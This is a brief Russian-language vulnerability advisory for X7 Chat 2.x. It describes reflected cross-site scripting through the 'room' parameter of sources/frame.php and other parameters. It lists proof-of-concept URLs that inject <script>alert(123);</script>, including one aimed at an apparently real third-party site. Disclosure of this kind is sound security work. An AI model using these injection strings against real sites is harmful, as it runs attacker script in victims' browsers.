Программа: X7 Chat 2.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "room" сценарием sources/frame.php. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
сайта.
Пример:
Если Register_globals: Включена
/path/upgradev1.php?INSTALL_X7CHATVERSION=<script>alert(123);</script>
/path/help/index.php?theme_c=<script>alert(123);</script>
Если Register_globals: Выключена
/path/help/index.php?theme_c=<script>alert(123);</script>
/path/sources/frame.php?room=<script>alert(123);</script>
Пример:
http://kyalla.gotdns.com/users/test/html/x7chat/help/index.php?theme_c=<script>alert(123);</script>
